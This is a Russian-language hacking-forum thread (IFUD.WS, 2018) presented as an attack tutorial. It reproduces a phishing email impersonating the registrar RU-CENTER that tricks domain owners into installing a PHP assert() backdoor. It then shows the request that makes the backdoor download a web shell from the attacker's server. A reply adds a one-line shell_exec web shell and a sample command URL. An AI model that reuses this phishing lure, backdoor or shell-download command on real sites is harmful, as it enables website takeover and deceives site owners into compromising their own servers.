1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

СИ - Взлом сайтов

Тема в разделе "Наши статьи", создана пользователем ResH, 8 мар 2018.

  1. TopicStarter Overlay
    ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.984
    Симпатии:
    2.353
    Недавно наткнулся на статью про фишинг которую рассылали владельцам .ru доменов

    Код:
    Уважаемый клиент!
    
    В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить,
    что фактическое управление доменом ******* осуществляется лицом,
    указанным в качестве его администратора.
    
    Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом,
    создайте в корневой директории сайта файл a7offau08fn0f81n.php со следующим
    содержимым:
    
    <?php
    assert(stripslashes($_REQUEST[RUCENTER]));
    ?>
    
    Файл должен быть создан в течение трех рабочих дней с момента получения
    настоящего письма и находиться на сервере до 24 декабря 2016 года, 20:00
    (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
    
    Обращаем Ваше внимание на то, что если процедура подтверждения не будет
    пройдена, делегирование домена будет приостановлено.
    
    © АО «Региональный Сетевой Информационный Центр» (RU-CENTER)
    8 800 775-29-99, 8 800 250-27-99,
    +7 495 994-46-01
    
    Вы подписались на рассылку в настройках уведомлений.
    Отписаться от рассылки
    Тот кто клюет на это создает у себя на сервере файл a7offau08fn0f81n.php с вышеуказанным кодом
    Плюс данного кода в том что он короткий и для среднестатистического владельца домена выглядит как безобидный код. На самом же деле с помощью данного кода мы загрузим на сервер свой шелл. Допустим владелец домена клюнул и загрузил на сайт Войти или зарегистрироваться, чтобы увидеть ссылку. файл a7offau08fn0f81n.php
    значит наш файл должен находится по адресу Войти или зарегистрироваться, чтобы увидеть ссылку.
    Потом командой

    Код:
    http://site.ru/a7offau08fn0f81n.php?RUCENTER=file_put_contents('shell.php',file_get_contents('http://moy_sayt.ru/shell.txt'));
    Мы загружаем на удаленный сайт наш шелл файл. Шелл файл должен лежать по адресу Войти или зарегистрироваться, чтобы увидеть ссылку.
    Как вы видите шелл код должен иметь .txt расширения. Данная команда закачает на этот удаленный сайт этот файл и расширения этого файла изменит на .php
    После этого по адресу Войти или зарегистрироваться, чтобы увидеть ссылку. у нас будет стоять полноценный шелл файл
     
    • Like Like x 1
    Последнее редактирование: 8 мар 2018
  2. D108

    D108

    Регистрация:
    26 июл 2017
    Сообщения:
    314
    Симпатии:
    104
    К слову
    Код:
    <?php echo shell_exec($_GET['e'].' 2>&1'); ?>
    Самый простой однострочный шелл
    Так будет должна выглядеть команда
    Код:
     http://site.ru/shell.php?e=whoami
     
  3. TopicStarter Overlay
    ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.984
    Симпатии:
    2.353
    Есть много вариантов
    Тут просто акцент делался на то чтоб код выглядел менее подозрительным
     
    • Agree Agree x 1

Поделиться этой страницей

Загрузка...